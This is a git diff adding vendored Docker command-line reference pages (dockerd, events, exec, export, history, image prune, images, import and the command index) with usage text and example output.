`/var/run/docker.sock`. +- `--iptables=false` prevents the Docker daemon from adding iptables rules. If +multiple daemons manage iptables rules, they may overwrite rules set by another +daemon. Be aware that disabling this option requires you to manually add +iptables rules to expose container ports. If you prevent Docker from adding +iptables rules, Docker will also not add IP masquerading rules, even if you set +`--ip-masq` to `true`. Without IP masquerading rules, Docker containers will not be +able to connect to external hosts or the internet when using network other than +default bridge. +- `--config-file=/etc/docker/daemon.json` is the path where configuration file is stored. You can use it instead of +daemon flags. Specify the path for each daemon. +- `--tls*` Docker daemon supports `--tlsverify` mode that enforces encrypted and authenticated remote connections. +The `--tls*` options enable use of specific certificates for individual daemons. + +Example script for a separate “bootstrap” instance of the Docker daemon without network: + +```bash +$ sudo dockerd \ + -H unix:///var/run/docker-bootstrap.sock \ + -p /var/run/docker-bootstrap.pid \ + --iptables=false \ + --ip-masq=false \ + --bridge=none \ + --graph=/var/lib/docker-bootstrap \ + --exec-root=/var/run/docker-bootstrap +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/events.md b/vendor/github.com/docker/docker/docs/reference/commandline/events.md new file mode 100644 index 0000000000..baa966d620 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/events.md @@ -0,0 +1,217 @@ +--- +title: "events" +description: "The events command description and usage" +keywords: "events, container, report" +--- + + + +# events + +```markdown +Usage: docker events [OPTIONS] + +Get real time events from the server + +Options: + -f, --filter value Filter output based on conditions provided (default []) + --format string Format the output using the given Go template + --help Print usage + --since string Show all events created since timestamp + --until string Stream events until this timestamp +``` + +Docker containers report the following events: + + attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, load, pull, push, save, tag, untag + +Docker plugins report the following events: + + install, enable, disable, remove + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +Docker daemon report the following events: + + reload + +The `--since` and `--until` parameters can be Unix timestamps, date formatted +timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed +relative to the client machine’s time. If you do not provide the `--since` option, +the command returns only new and/or live events. Supported formats for date +formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If you would +like to use multiple filters, pass multiple flags (e.g., +`--filter "foo=bar" --filter "bif=baz"`) + +Using the same filter multiple times will be handled as a *OR*; for example +`--filter container=588a23dac085 --filter container=a8f7720b8c22` will display +events for container 588a23dac085 *OR* container a8f7720b8c22 + +Using multiple filters will be handled as a *AND*; for example +`--filter container=588a23dac085 --filter event=start` will display events for +container container 588a23dac085 *AND* the event type is *start* + +The currently supported filters are: + +* container (`container=`) +* event (`event=`) +* image (`image=`) +* plugin (experimental) (`plugin=`) +* label (`label=` or `label==`) +* type (`type=`) +* volume (`volume=`) +* network (`network=`) +* daemon (`daemon=`) + +## Format + +If a format (`--format`) is specified, the given template will be executed +instead of the default +format. Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +If a format is set to `{{json .}}`, the events are streamed as valid JSON +Lines. For information about JSON Lines, please refer to http://jsonlines.org/ . + +## Examples + +You'll need two shells for this example. + +**Shell 1: Listening for events:** + + $ docker events + +**Shell 2: Start and Stop containers:** + + $ docker start 4386fb97867d + $ docker stop 4386fb97867d + $ docker stop 7805c1d35632 + +**Shell 1: (Again .. now showing events):** + + 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + +**Show events in the past from a specified time:** + + $ docker events --since 1378216169 + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --since '2013-09-03' + 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --since '2013-09-03T15:49:29' + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + +This example outputs all events that were generated in the last 3 minutes, +relative to the current time on the client machine: + + $ docker events --since '3m' + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + +**Filter events:** + + $ docker events --filter 'event=stop' + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'image=ubuntu-1:14.04' + 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + + $ docker events --filter 'container=7805c1d35632' + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' + 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'container=container_1' --filter 'container=container_2' + 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (imager=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'type=volume' + 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) + 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) + 2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) + 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) + + $ docker events --filter 'type=network' + 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) + 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) + + $ docker events --filter 'type=plugin' (experimental) + 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + +**Format:** + + $ docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' + Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + +**Format (as JSON Lines):** + + $ docker events --format '{{json .}}' + {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. + {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. + {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md new file mode 100644 index 0000000000..38891c9ea0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md @@ -0,0 +1,65 @@ +--- +title: "exec" +description: "The exec command description and usage" +keywords: "command, container, run, execute" +--- + + + +# exec + +```markdown +Usage: docker exec [OPTIONS] CONTAINER COMMAND [ARG...] + +Run a command in a running container + +Options: + -d, --detach Detached mode: run command in the background + --detach-keys Override the key sequence for detaching a container + -e, --env=[] Set environment variables + --help Print usage + -i, --interactive Keep STDIN open even if not attached + --privileged Give extended privileges to the command + -t, --tty Allocate a pseudo-TTY + -u, --user Username or UID (format: [:]) +``` + +The `docker exec` command runs a new command in a running container. + +The command started using `docker exec` only runs while the container's primary +process (`PID 1`) is running, and it is not restarted if the container is +restarted. + +If the container is paused, then the `docker exec` command will fail with an error: + + $ docker pause test + test + $ docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + 1ae3b36715d2 ubuntu:latest "bash" 17 seconds ago Up 16 seconds (Paused) test + $ docker exec test ls + FATA[0000] Error response from daemon: Container test is paused, unpause the container before exec + $ echo $? + 1 + +## Examples + + $ docker run --name ubuntu_bash --rm -i -t ubuntu bash + +This will create a container named `ubuntu_bash` and start a Bash session. + + $ docker exec -d ubuntu_bash touch /tmp/execWorks + +This will create a new file `/tmp/execWorks` inside the running container +`ubuntu_bash`, in the background. + + $ docker exec -it ubuntu_bash bash + +This will create a new Bash session in the container `ubuntu_bash`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/export.md b/vendor/github.com/docker/docker/docs/reference/commandline/export.md new file mode 100644 index 0000000000..1004fc30c0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/export.md @@ -0,0 +1,43 @@ +--- +title: "export" +description: "The export command description and usage" +keywords: "export, file, system, container" +--- + + + +# export + +```markdown +Usage: docker export [OPTIONS] CONTAINER + +Export a container's filesystem as a tar archive + +Options: + --help Print usage + -o, --output string Write to a file, instead of STDOUT +``` + +The `docker export` command does not export the contents of volumes associated +with the container. If a volume is mounted on top of an existing directory in +the container, `docker export` will export the contents of the *underlying* +directory, not the contents of the volume. + +Refer to [Backup, restore, or migrate data +volumes](https://docs.docker.com/engine/tutorials/dockervolumes/#backup-restore-or-migrate-data-volumes) in +the user guide for examples on exporting data in a volume. + +## Examples + + $ docker export red_panda > latest.tar + +Or + + $ docker export --output="latest.tar" red_panda diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/history.md b/vendor/github.com/docker/docker/docs/reference/commandline/history.md new file mode 100644 index 0000000000..00f88db35b --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/history.md @@ -0,0 +1,48 @@ +--- +title: "history" +description: "The history command description and usage" +keywords: "docker, image, history" +--- + + + +# history + +```markdown +Usage: docker history [OPTIONS] IMAGE + +Show the history of an image + +Options: + --help Print usage + -H, --human Print sizes and dates in human readable format (default true) + --no-trunc Don't truncate output + -q, --quiet Only show numeric IDs +``` + +To see how the `docker:latest` image was built: + + $ docker history docker + IMAGE CREATED CREATED BY SIZE COMMENT + 3e23a5875458 8 days ago /bin/sh -c #(nop) ENV LC_ALL=C.UTF-8 0 B + 8578938dd170 8 days ago /bin/sh -c dpkg-reconfigure locales && loc 1.245 MB + be51b77efb42 8 days ago /bin/sh -c apt-get update && apt-get install 338.3 MB + 4b137612be55 6 weeks ago /bin/sh -c #(nop) ADD jessie.tar.xz in / 121 MB + 750d58736b4b 6 weeks ago /bin/sh -c #(nop) MAINTAINER Tianon Gravi + +# image prune + +```markdown +Usage: docker image prune [OPTIONS] + +Remove unused images + +Options: + -a, --all Remove all unused images, not just dangling ones + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all dangling images. If `-a` is specified, will also remove all images not referenced by any container. + +Example output: + +```bash +$ docker image prune -a +WARNING! This will remove all images without at least one container associated to them. +Are you sure you want to continue? [y/N] y +Deleted Images: +untagged: alpine:latest +untagged: alpine@sha256:3dcdb92d7432d56604d4545cbd324b14e647b313626d99b889d0626de158f73a +deleted: sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba +deleted: sha256:4fe15f8d0ae69e169824f25f1d4da3015a48feeeeebb265cd2e328e15c6a869f +untagged: alpine:3.3 +untagged: alpine@sha256:4fa633f4feff6a8f02acfc7424efd5cb3e76686ed3218abf4ca0fa4a2a358423 +untagged: my-jq:latest +deleted: sha256:ae67841be6d008a374eff7c2a974cde3934ffe9536a7dc7ce589585eddd83aff +deleted: sha256:34f6f1261650bc341eb122313372adc4512b4fceddc2a7ecbb84f0958ce5ad65 +deleted: sha256:cf4194e8d8db1cb2d117df33f2c75c0369c3a26d96725efb978cc69e046b87e7 +untagged: my-curl:latest +deleted: sha256:b2789dd875bf427de7f9f6ae001940073b3201409b14aba7e5db71f408b8569e +deleted: sha256:96daac0cb203226438989926fc34dd024f365a9a8616b93e168d303cfe4cb5e9 +deleted: sha256:5cbd97a14241c9cd83250d6b6fc0649833c4a3e84099b968dd4ba403e609945e +deleted: sha256:a0971c4015c1e898c60bf95781c6730a05b5d8a2ae6827f53837e6c9d38efdec +deleted: sha256:d8359ca3b681cc5396a4e790088441673ed3ce90ebc04de388bfcd31a0716b06 +deleted: sha256:83fc9ba8fb70e1da31dfcc3c88d093831dbd4be38b34af998df37e8ac538260c +deleted: sha256:ae7041a4cc625a9c8e6955452f7afe602b401f662671cea3613f08f3d9343b35 +deleted: sha256:35e0f43a37755b832f0bbea91a2360b025ee351d7309dae0d9737bc96b6d0809 +deleted: sha256:0af941dd29f00e4510195dd00b19671bc591e29d1495630e7e0f7c44c1e6a8c0 +deleted: sha256:9fc896fc2013da84f84e45b3096053eb084417b42e6b35ea0cce5a3529705eac +deleted: sha256:47cf20d8c26c46fff71be614d9f54997edacfe8d46d51769706e5aba94b16f2b +deleted: sha256:2c675ee9ed53425e31a13e3390bf3f539bf8637000e4bcfbb85ee03ef4d910a1 + +Total reclaimed space: 16.43 MB +``` + +## Related information + +* [system df](system_df.md) +* [container prune](container_prune.md) +* [volume prune](volume_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/images.md b/vendor/github.com/docker/docker/docs/reference/commandline/images.md new file mode 100644 index 0000000000..3b9ea1fe17 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/images.md @@ -0,0 +1,304 @@ +--- +title: "images" +description: "The images command description and usage" +keywords: "list, docker, images" +--- + + + +# images + +```markdown +Usage: docker images [OPTIONS] [REPOSITORY[:TAG]] + +List images + +Options: + -a, --all Show all images (default hides intermediate images) + --digests Show digests + -f, --filter value Filter output based on conditions provided (default []) + - dangling=(true|false) + - label= or label== + - before=([:tag]||) + - since=([:tag]||) + - reference=(pattern of an image reference) + --format string Pretty-print images using a Go template + --help Print usage + --no-trunc Don't truncate output + -q, --quiet Only show numeric IDs +``` + +The default `docker images` will show all top level +images, their repository and tags, and their size. + +Docker images have intermediate layers that increase reusability, +decrease disk usage, and speed up `docker build` by +allowing each step to be cached. These intermediate layers are not shown +by default. + +The `SIZE` is the cumulative space taken up by the image and all +its parent images. This is also the disk space used by the contents of the +Tar file created when you `docker save` an image. + +An image will be listed more than once if it has multiple repository names +or tags. This single image (identifiable by its matching `IMAGE ID`) +uses up the `SIZE` listed only once. + +### Listing the most recently created images + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + 77af4d6b9913 19 hours ago 1.089 GB + committ latest b6fa739cedf5 19 hours ago 1.089 GB + 78a85c484f71 19 hours ago 1.089 GB + docker latest 30557a29d5ab 20 hours ago 1.089 GB + 5ed6274db6ce 24 hours ago 1.089 GB + postgres 9 746b819f315e 4 days ago 213.4 MB + postgres 9.3 746b819f315e 4 days ago 213.4 MB + postgres 9.3.5 746b819f315e 4 days ago 213.4 MB + postgres latest 746b819f315e 4 days ago 213.4 MB + +### Listing images by name and tag + +The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument +that restricts the list to images that match the argument. If you specify +`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the +given repository. + +For example, to list all images in the "java" repository, run this command : + + $ docker images java + REPOSITORY TAG IMAGE ID CREATED SIZE + java 8 308e519aac60 6 days ago 824.5 MB + java 7 493d82594c15 3 months ago 656.3 MB + java latest 2711b1d6f3aa 5 months ago 603.9 MB + +The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example, +`docker images jav` does not match the image `java`. + +If both `REPOSITORY` and `TAG` are provided, only images matching that +repository and tag are listed. To find all local images in the "java" +repository with tag "8" you can use: + + $ docker images java:8 + REPOSITORY TAG IMAGE ID CREATED SIZE + java 8 308e519aac60 6 days ago 824.5 MB + +If nothing matches `REPOSITORY[:TAG]`, the list is empty. + + $ docker images java:0 + REPOSITORY TAG IMAGE ID CREATED SIZE + +## Listing the full length image IDs + + $ docker images --no-trunc + REPOSITORY TAG IMAGE ID CREATED SIZE + sha256:77af4d6b9913e693e8d0b4b294fa62ade6054e6b2f1ffb617ac955dd63fb0182 19 hours ago 1.089 GB + committest latest sha256:b6fa739cedf5ea12a620a439402b6004d057da800f91c7524b5086a5e4749c9f 19 hours ago 1.089 GB + sha256:78a85c484f71509adeaace20e72e941f6bdd2b25b4c75da8693efd9f61a37921 19 hours ago 1.089 GB + docker latest sha256:30557a29d5abc51e5f1d5b472e79b7e296f595abcf19fe6b9199dbbc809c6ff4 20 hours ago 1.089 GB + sha256:0124422dd9f9cf7ef15c0617cda3931ee68346455441d66ab8bdc5b05e9fdce5 20 hours ago 1.089 GB + sha256:18ad6fad340262ac2a636efd98a6d1f0ea775ae3d45240d3418466495a19a81b 22 hours ago 1.082 GB + sha256:f9f1e26352f0a3ba6a0ff68167559f64f3e21ff7ada60366e2d44a04befd1d3a 23 hours ago 1.089 GB + tryout latest sha256:2629d1fa0b81b222fca63371ca16cbf6a0772d07759ff80e8d1369b926940074 23 hours ago 131.5 MB + sha256:5ed6274db6ceb2397844896966ea239290555e74ef307030ebb01ff91b1914df 24 hours ago 1.089 GB + +## Listing image digests + +Images that use the v2 or later format have a content-addressable identifier +called a `digest`. As long as the input used to generate the image is +unchanged, the digest value is predictable. To list image digest values, use +the `--digests` flag: + + $ docker images --digests + REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE + localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 4986bf8c1536 9 weeks ago 2.43 MB + +When pushing or pulling to a 2.0 registry, the `push` or `pull` command +output includes the image digest. You can `pull` using a digest value. You can +also reference by digest in `create`, `run`, and `rmi` commands, as well as the +`FROM` image reference in a Dockerfile. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* dangling (boolean - true or false) +* label (`label=` or `label==`) +* before (`[:]`, `` or ``) - filter images created before given id or references +* since (`[:]`, `` or ``) - filter images created since given id or references + +##### Untagged images (dangling) + + $ docker images --filter "dangling=true" + + REPOSITORY TAG IMAGE ID CREATED SIZE + 8abc22fbb042 4 weeks ago 0 B + 48e5f45168b9 4 weeks ago 2.489 MB + bf747efa0e2f 4 weeks ago 0 B + 980fe10e5736 12 weeks ago 101.4 MB + dea752e4e117 12 weeks ago 101.4 MB + 511136ea3c5a 8 months ago 0 B + +This will display untagged images, that are the leaves of the images tree (not +intermediary layers). These images occur when a new build of an image takes the +`repo:tag` away from the image ID, leaving it as `:` or untagged. +A warning will be issued if trying to remove an image when a container is presently +using it. By having this flag it allows for batch cleanup. + +Ready for use by `docker rmi ...`, like: + + $ docker rmi $(docker images -f "dangling=true" -q) + + 8abc22fbb042 + 48e5f45168b9 + bf747efa0e2f + 980fe10e5736 + dea752e4e117 + 511136ea3c5a + +NOTE: Docker will warn you if any containers exist that are using these untagged images. + + +##### Labeled images + +The `label` filter matches images based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches images with the `com.example.version` label regardless of its value. + + $ docker images --filter "label=com.example.version" + + REPOSITORY TAG IMAGE ID CREATED SIZE + match-me-1 latest eeae25ada2aa About a minute ago 188.3 MB + match-me-2 latest dea752e4e117 About a minute ago 188.3 MB + +The following filter matches images with the `com.example.version` label with the `1.0` value. + + $ docker images --filter "label=com.example.version=1.0" + REPOSITORY TAG IMAGE ID CREATED SIZE + match-me latest 511136ea3c5a About a minute ago 188.3 MB + +In this example, with the `0.1` value, it returns an empty set because no matches were found. + + $ docker images --filter "label=com.example.version=0.1" + REPOSITORY TAG IMAGE ID CREATED SIZE + +#### Before + +The `before` filter shows only images created before the image with +given id or reference. For example, having these images: + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + image1 latest eeae25ada2aa 4 minutes ago 188.3 MB + image2 latest dea752e4e117 9 minutes ago 188.3 MB + image3 latest 511136ea3c5a 25 minutes ago 188.3 MB + +Filtering with `before` would give: + + $ docker images --filter "before=image1" + REPOSITORY TAG IMAGE ID CREATED SIZE + image2 latest dea752e4e117 9 minutes ago 188.3 MB + image3 latest 511136ea3c5a 25 minutes ago 188.3 MB + +#### Since + +The `since` filter shows only images created after the image with +given id or reference. For example, having these images: + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + image1 latest eeae25ada2aa 4 minutes ago 188.3 MB + image2 latest dea752e4e117 9 minutes ago 188.3 MB + image3 latest 511136ea3c5a 25 minutes ago 188.3 MB + +Filtering with `since` would give: + + $ docker images --filter "since=image3" + REPOSITORY TAG IMAGE ID CREATED SIZE + image1 latest eeae25ada2aa 4 minutes ago 188.3 MB + image2 latest dea752e4e117 9 minutes ago 188.3 MB + +#### Reference + +The `reference` filter shows only images whose reference matches +the specified pattern. + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest e02e811dd08f 5 weeks ago 1.09 MB + busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB + busybox musl 733eb3059dce 5 weeks ago 1.21 MB + busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB + +Filtering with `reference` would give: + + $ docker images --filter=reference='busy*:*libc' + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB + busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB + +## Formatting + +The formatting option (`--format`) will pretty print container output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +---- | ---- +`.ID` | Image ID +`.Repository` | Image repository +`.Tag` | Image tag +`.Digest` | Image digest +`.CreatedSince` | Elapsed time since the image was created +`.CreatedAt` | Time when the image was created +`.Size` | Image disk size + +When using the `--format` option, the `image` command will either +output the data exactly as the template declares or, when using the +`table` directive, will include column headers as well. + +The following example uses a template without headers and outputs the +`ID` and `Repository` entries separated by a colon for all images: + + {% raw %} + $ docker images --format "{{.ID}}: {{.Repository}}" + 77af4d6b9913: + b6fa739cedf5: committ + 78a85c484f71: + 30557a29d5ab: docker + 5ed6274db6ce: + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + {% endraw %} + +To list all images with their repository and tag in a table format you +can use: + + {% raw %} + $ docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" + IMAGE ID REPOSITORY TAG + 77af4d6b9913 + b6fa739cedf5 committ latest + 78a85c484f71 + 30557a29d5ab docker latest + 5ed6274db6ce + 746b819f315e postgres 9 + 746b819f315e postgres 9.3 + 746b819f315e postgres 9.3.5 + 746b819f315e postgres latest + {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/import.md b/vendor/github.com/docker/docker/docs/reference/commandline/import.md new file mode 100644 index 0000000000..20e90a61fd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/import.md @@ -0,0 +1,75 @@ +--- +title: "import" +description: "The import command description and usage" +keywords: "import, file, system, container" +--- + + + +# import + +```markdown +Usage: docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]] + +Import the contents from a tarball to create a filesystem image + +Options: + -c, --change value Apply Dockerfile instruction to the created image (default []) + --help Print usage + -m, --message string Set commit message for imported image +``` + +You can specify a `URL` or `-` (dash) to take data directly from `STDIN`. The +`URL` can point to an archive (.tar, .tar.gz, .tgz, .bzip, .tar.xz, or .txz) +containing a filesystem or to an individual file on the Docker host. If you +specify an archive, Docker untars it in the container relative to the `/` +(root). If you specify an individual file, you must specify the full path within +the host. To import from a remote location, specify a `URI` that begins with the +`http://` or `https://` protocol. + +The `--change` option will apply `Dockerfile` instructions to the image +that is created. +Supported `Dockerfile` instructions: +`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +## Examples + +**Import from a remote location:** + +This will create a new untagged image. + + $ docker import http://example.com/exampleimage.tgz + +**Import from a local file:** + +Import to docker via pipe and `STDIN`. + + $ cat exampleimage.tgz | docker import - exampleimagelocal:new + +Import with a commit message. + + $ cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new + +Import to docker from a local archive. + + $ docker import /path/to/exampleimage.tgz + +**Import from a local directory:** + + $ sudo tar -c . | docker import - exampleimagedir + +**Import from a local directory with new configurations:** + + $ sudo tar -c . | docker import --change "ENV DEBUG true" - exampleimagedir + +Note the `sudo` in this example – you must preserve +the ownership of the files (especially root ownership) during the +archiving with tar. If you are not root (or the sudo command) when you +tar, then the ownerships might not get preserved. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/index.md b/vendor/github.com/docker/docker/docs/reference/commandline/index.md new file mode 100644 index 0000000000..952fa09df1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/index.md @@ -0,0 +1,178 @@ +--- +title: "Docker commands" +description: "Docker's CLI command description and usage" +keywords: "Docker, Docker documentation, CLI, command line" +identifier: "smn_cli_guide" +--- + + + +# The Docker commands + +This section contains reference information on using Docker's command line +client. Each command has a reference page along with samples. If you are +unfamiliar with the command line, you should start by reading about how to [Use +the Docker command line](cli.md). + +You start the Docker daemon with the command line. How you start the daemon +affects your Docker containers. For that reason you should also make sure to +read the [`dockerd`](dockerd.md) reference page. + +### Docker management commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [dockerd](dockerd.md) | Launch the Docker daemon | +| [info](info.md) | Display system-wide information | +| [inspect](inspect.md)| Return low-level information on a container or image | +| [version](version.md) | Show the Docker version information | + + +### Image commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [build](build.md) | Build an image from a Dockerfile | +| [commit](commit.md) | Create a new image from a container's changes | +| [history](history.md) | Show the history of an image | +| [images](images.md) | List images | +| [import](import.md) | Import the contents from a tarball to create a filesystem image | +| [load](load.md) | Load an image from a tar archive or STDIN | +| [rmi](rmi.md) | Remove one or more images | +| [save](save.md) | Save images to a tar archive | +| [tag](tag.md) | Tag an image into a repository | + +### Container commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [attach](attach.md) 